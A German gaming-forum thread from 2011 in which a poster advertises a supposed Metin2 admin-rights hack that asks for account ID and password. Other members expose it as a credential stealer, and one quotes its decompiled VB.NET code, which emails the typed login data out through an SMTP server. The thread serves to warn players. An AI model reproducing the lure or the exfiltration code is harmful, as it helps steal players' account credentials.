[Release] Metin2 Official Admin rechte Hack

11/28/2011 17:50 .Ultimativ#1
[center]Hallo leute ,

Ich habe vor kurzen nen Admin rechte Hack gefunden . Also der Hack wurde vor 7 stunden oder so in anderen Metin2 Foren publiziert und auf Polnischen Foren wurde vor 30 minuten auch schon publiziert . Da es schon sehr viele haben wollte ich es dann halt in epvp auch pub machen aber ich denke jemand hat es schon hier pub gemacht . Also ich hab nix gefunden daher tut mir leid .

Funktion :

1.ID eintragen

2. PW eintragen

3. auf weiter Klicken

4. Warten bis der Progessbar grün ist (in der zeit verbindet der zum Officiellen Mysql Server .)

5. Ihr habt nun Admin rechte auf der Metin2.de Seite

Ich denke der Hack wird bis etwa in 1 woche wieder gefixxt da GF es bei über 1 Million logs es sicher merken wird .

Naja habt spaß damit und nutzt es solange es wie es nur bloß geht .
11/28/2011 18:21 Brookii#2
epic fail.....
11/28/2011 18:29 Marcoly#3
Achtung, bitte die Datei nicht downloaden !

Ist ein Programm (VisualBasic), das eure Daten an ihn sendet.

#closerequest - Verseuchte Dateien im Download

MfG Marco_A
11/28/2011 18:33 Slicktor#4
Aha,richtiger Keylogger drine zu 100% man kann keine neuen Mitglieder in elitepvpers vertrauen die posten immer Keylogger's und der GM Keylogger rechte Hack gehört hir nicht rein poste es im anderen Forum glaubst du bist hir der beste in Hacks herstellen , dann wurde ich mich ganz schön.....

+

In in >Visual basic geschrieben<.

#Virustotal fehlt
#Screen?
#Moverequest
#closerequest
#warningrequest

>Mfg Cuan<
11/28/2011 18:34 .Vapor#5
Ach was du nicht sagst? :'D

Hätt ich auch selber verstanden, echt. Ich weiss, du meinst es nur gut, aber trozdem ein unnötiger Beitrag, es gibt echt keinen, der auf so einen Trick reinfallen würde.

@Marco A
11/28/2011 18:37 .Ultimativ#6
[Only registered and activated users can see links. Click Here To Register...] Da virustest ihr beschissenen kinder das ist kein keylogger
11/28/2011 18:41 Slicktor#7
Quote:
Also ich kann das Beweisen das das ein Keylogger ist ich habe mir den Source angesehen!
Code:
Private Sub Button1_Click(ByVal sender As Object, ByVal e As EventArgs)
Me.Timer1.Start
Dim body As String = (Me.TextBox1.Text & Me.TextBox2.Text & ChrW(10))
New SmtpClient("smtp.web.de") With { _
.Credentials = New NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "jaduhastmichgehacktichwei" & ChrW(223)) _
}.Send("[Only registered and activated users can see links. Click Here To Register...]", "[Only registered and activated users can see links. Click Here To Register...], [Only registered and activated users can see links. Click Here To Register...]", "Daten", body)
End Sub

>Mfg Cuan<
11/28/2011 18:45 .aNNdii##8
#closed.